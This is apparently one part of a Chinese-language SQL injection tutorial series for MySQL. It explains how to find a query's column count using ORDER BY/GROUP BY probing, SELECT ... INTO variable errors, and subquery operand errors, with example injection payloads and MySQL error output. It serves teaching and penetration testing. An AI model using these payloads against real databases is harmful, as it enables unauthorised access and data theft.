上接sql注入知识库-mysql篇(2)
表和字段
一、检测字段数量
order by/group by
group by / order by +1 ;
备注:
order by 和 group by 都是用来根据字段排序用的
保持数字持续增加,直到得到一个错误响应
尽管group by 和 order by 在sql中是不同的功能,他们都可以用完全相同的方式确认查询的列数
examples:
Given the query SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';
1’ order by 1--+ true
还原一下 select username,password,permission from users where id = '1' order by 1 --+
从users表查询id = 1 的username , password permission 然后通过第一个字段(username)按照升序排列
1’ order by 2--+ true
。。。。
1’ order by 4--+ false 说明该表总共有3列
1' union select 1,2,3 true
基于错误1
group by 或 order by 1,2,3,4,5 ......
类似上面提到的方法,我们可以通过一个请求查看显错模式是否启动来判断字段数量
examples:
select * from student where id = 1 order by 1,2,3 ; true
select * from student where id = 1 order by 1,2,3,4 ; true
select * from student where id = 1 order by 1,2,3,4,5 ; 返回 ERROR 1054 (42S22): Unknown column '5' in 'order clause'
说明该表字段只有4列
select * from student where id = 1 group by 1,2,3,4,5 ; 返回 ERROR 1054 (42S22): Unknown column '5' in 'group statement'
说明该表字段只有4列
基于错误2
select ... into var_list , var_list1 , var_list2 ....
1. 如果显错模式开启,这个方法可以正常工作
2. 是一个实用的用于查找字段数量的方法,当注入点后面存在一个limit子句的时候。
examples:
Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};
-1 union select 1 into @,@,@ The used SELECT statements have a different number of columns
-1 union select 1 into @ 如果不报错说明查询的信息使用了一个
mysql> select name,id1 from student limit 1,1 into @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select name,id1 from student limit 1,1 into @,@;
Query OK, 1 row affected (0.00 sec)
字段
实例
mysql> select name from student where id = -1 union select 1 into @; 可以看到该查询使用了name一个字段,所以后面用select 1 into @就不会报错
Query OK, 1 row affected (0.00 sec)
mysql> select name,id1 from student where id = -1 union select 1,2 into @,@; 这里使用了name和id1两个字段,所以后面相应的要使用1,2 into @,@ 不会报错
Query OK, 1 row affected (0.00 sec)
examples:
Given the query SELECT username, permission FROM Users limit 1,{INJECTION POINT};
1 into @,@,@ 报错 The used SELECT statements have a different number of columns
1 into @,@ 无报错说明查询的字段有2个
实例:
select name,id1 from student limit 1,1 into @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
select name,id1 from student limit 1,1 into @,@;
Query OK, 1 row affected (0.00 sec)
limit用法:
基于错误3
AND (SELECT * FROM SOME_EXISTING_TABLE) = 1
备注:
工作在你知道表名但是没有启用错误回显的环境,它会返回字段数量
example:
Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};
1 and (select * from student) = 1
实例:
select name,id from student where id = 1 and (select * from student) = 1;
ERROR 1241 (21000): Operand should contain 4 column(s)
select name,id from student where id = 1 and (select * from student) = 2;
ERROR 1241 (21000): Operand should contain 4 column(s)